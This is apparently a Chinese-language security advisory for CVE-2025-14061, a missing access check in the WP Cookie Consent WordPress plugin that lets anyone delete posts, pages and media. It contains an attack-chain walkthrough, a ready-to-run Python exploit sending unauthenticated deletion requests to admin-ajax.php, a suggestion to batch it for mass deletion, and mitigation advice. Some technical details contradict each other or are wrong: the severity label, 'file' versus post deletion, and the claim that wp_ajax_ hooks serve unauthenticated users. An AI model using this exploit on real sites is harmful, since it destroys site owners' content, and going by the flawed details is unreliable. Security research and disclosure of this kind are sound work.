CVE-2025-14061 WordPress WP Cookie Consent插件未授权任意文件删除漏洞

漏洞信息

漏洞编号

CVE-2025-14061

漏洞类型

缺少功能级访问控制

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WP Cookie Consent (GDPR Cookie Consent) WordPress插件

漏洞概述

CVE-2025-14061是WordPress插件WP Cookie Consent中的一个高危安全漏洞。该插件是一款广受欢迎的Cookie横幅、Cookie同意、同意日志、Cookie扫描器和脚本阻止插件，适用于GDPR、CCPA和ePrivacy合规。漏洞源于admin/class-gdpr-cookie-consent-admin.php文件中的gdpr_delete_policy_data函数缺少功能级访问控制检查。在WordPress中，某些管理功能需要适当的权限验证，但该函数允许未认证用户直接调用。由于WordPress的AJAX端点对未认证用户开放，攻击者可以构造恶意请求删除任意帖子、页面、媒体附件及其他自定义文章类型的内容。此漏洞影响所有版本直至4.0.7，CVSS评分5.3，属于中等严重程度。攻击无需任何认证或用户交互，可通过网络远程利用，对网站内容完整性和可用性造成威胁。

技术细节

漏洞存在于WP Cookie Consent插件的admin/class-gdpr-cookie-consent-admin.php文件第8091行和第8878行附近。gdpr_delete_policy_data函数负责删除策略相关数据，但该函数缺少current_user_can()或同等权限验证机制。在WordPress中，未认证用户可以访问wp-admin/admin-ajax.php端点，当插件通过wp_ajax_钩子注册此函数时，任何人都可以发送AJAX请求触发该函数。攻击者只需构造包含post_id参数的POST请求到admin-ajax.php，指定action参数为插件注册的AJAX动作，即可调用gdpr_delete_policy_data函数。由于函数内部直接调用wp_delete_post()或类似函数且未验证当前用户权限，攻击者可以删除任意ID的文章、页面、媒体文件等post type对象。WordPress的wp_delete_post()函数会将帖子标记为垃圾或永久删除附件，这对网站内容管理是严重威胁。修复方案是在gdpr_delete_policy_data函数开头添加权限检查：if(!current_user_can('manage_options')) wp_die();

攻击链分析

STEP 1

步骤1: 信息收集

攻击者确认目标网站使用WordPress CMS，并识别安装了WP Cookie Consent插件（GDPR Cookie Consent）。可通过网站源码、wappalyzer或直接访问插件目录确认。

STEP 2

步骤2: 漏洞识别

攻击者定位插件中的gdpr_delete_policy_data函数，该函数位于admin/class-gdpr-cookie-consent-admin.php文件中。通过代码审计或对比插件版本确认存在缺少权限检查的漏洞。

STEP 3

步骤3: 构造恶意请求

攻击者构造POST请求到WordPress的admin-ajax.php端点，设置action参数为gdpr_delete_policy_data，并在post_id参数中指定要删除的目标文章ID。由于函数缺少权限验证，请求可被成功处理。

STEP 4

步骤4: 执行删除操作

服务器端gdpr_delete_policy_data函数接收请求后，调用wp_delete_post()或类似函数删除指定ID的文章/页面/附件。删除操作可能是永久性的，对网站内容造成不可逆破坏。

STEP 5

步骤5: 批量利用

攻击者可编写脚本批量发送不同post_id的请求，实现对网站所有文章、页面、媒体库的自动化删除，造成严重的拒绝服务效果。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

'''
CVE-2025-14061 PoC - WP Cookie Consent Unauthenticated Arbitrary Post Deletion
Description: Missing capability check in gdpr_delete_policy_data function allows
             unauthenticated attackers to permanently delete arbitrary posts/pages.
Author: Security Research
Reference: https://www.wordfence.com/threat-intel/vulnerabilities/id/866b4ca8-563f-4a19-bbf7-79a79f07d53d
'''

def delete_post(target_url, post_id, proxies=None):
    """
    Delete arbitrary post/page without authentication
    
    Args:
        target_url: Target WordPress site URL (e.g., https://example.com)
        post_id: ID of post/page/attachment to delete
        proxies: Optional proxy configuration
    """
    # Construct AJAX endpoint
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    # Determine the AJAX action name - typically 'gdpr_delete_policy_data'
    # The actual action name should be extracted from plugin source code
    action_name = 'gdpr_delete_policy_data'
    
    # Prepare POST data
    data = {
        'action': action_name,
        'post_id': post_id
    }
    
    try:
        print(f"[*] Sending deletion request for post ID: {post_id}")
        response = requests.post(
            ajax_url,
            data=data,
            proxies=proxies,
            timeout=30,
            verify=False
        )
        
        if response.status_code == 200:
            print(f"[+] Request sent successfully")
            print(f"[+] Response: {response.text[:500]}")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-14061.py <target_url> <post_id>")
        print("Example: python cve-2025-14061.py https://victim.com 123")
        sys.exit(1)
    
    target = sys.argv[1]
    post_id = sys.argv[2]
    
    delete_post(target, post_id)

影响范围

WP Cookie Consent (GDPR Cookie Consent) 插件 < 4.0.8

防御指南

临时缓解措施

作为临时缓解措施，可通过.htaccess或Nginx配置限制未认证用户对admin-ajax.php的访问，或者暂时禁用/删除WP Cookie Consent插件直到完成升级。同时建议开启WordPress的自动更新功能，以便及时获得安全补丁。对于无法立即升级的情况，可通过添加自定义代码在functions.php中为gdpr_delete_policy_data函数添加权限检查，或者使用WordPress防火墙插件阻止此类未授权访问。